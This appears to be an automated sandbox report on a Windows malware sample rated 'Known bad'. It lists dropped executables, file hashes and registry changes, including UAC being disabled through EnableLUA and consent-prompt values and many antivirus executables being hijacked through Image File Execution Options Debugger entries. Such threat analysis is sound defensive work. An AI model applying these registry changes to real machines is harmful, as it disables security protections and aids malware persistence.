Analysis Overview
SHA256
191f71d0ce6906e90271c1a713d6420759744e21455818a244f4331f38e16b08
Threat Level: Known bad
The file 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
UAC bypass
Stops running service(s)
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Indicator Removal: File Deletion
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-31 05:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-31 05:06
Reported
2024-10-31 05:08
Platform
win7-20241010-en
Max time kernel
14s
Max time network
19s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID\ = "IMAPI2.MsftDiscFormat2Data.1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Programmable\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64\ = "%SystemRoot%\\SysWow64\\sdohlp.dll\\1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\ = "IAS SDO Helper 1.0 Type Library" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib\ = "{443FC784-A7AA-A9B0-6E89-3A91DED0287F}" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32\ = "%SystemRoot%\\SysWow64\\sdohlp.dll\\1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID\ = "IMAPI2.MsftDiscFormat2Data" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ = "Evebof Wodiposbo Kocagedpa Object" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32\ = "C:\\Windows\\SysWOW64\\imapi2.dll" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Programmable | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version\ = "1.0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
| MD5 | cb29fc6c4d1be6464d118d58750c7286 |
| SHA1 | d942e69817be663057275b373b308f6f4a5bdea4 |
| SHA256 | a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9 |
| SHA512 | bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7 |
\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
| MD5 | c0ecef6a5e45a04e9b341ef74a4dd08f |
| SHA1 | f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a |
| SHA256 | 7f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d |
| SHA512 | fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac |
memory/928-23-0x00000000032B0000-0x0000000003689000-memory.dmp
memory/928-25-0x00000000032B0000-0x0000000003689000-memory.dmp
memory/2468-30-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2468-31-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-32-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-34-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-33-0x0000000000400000-0x00000000007D9000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-31 05:06
Reported
2024-10-31 05:08
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
140s
Command Line
Signatures
Disables service(s)
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgri32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvxd.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netinfo.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscenu6.02d30.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fih32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fnrb32.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsma32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JsRcGen.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mrflux.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npssvc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brw.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcupdate.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neomonitor.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beagle.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav95.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwtool16.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdater.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgctrl.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prmvr.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tca.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgw.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRegSvr.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfd.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netutils.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vettray.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fch32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixfp.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nui.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWEBGRD.EXE | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanIELow.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssupdat.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webdav.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lucomserver.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avmcdlg.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
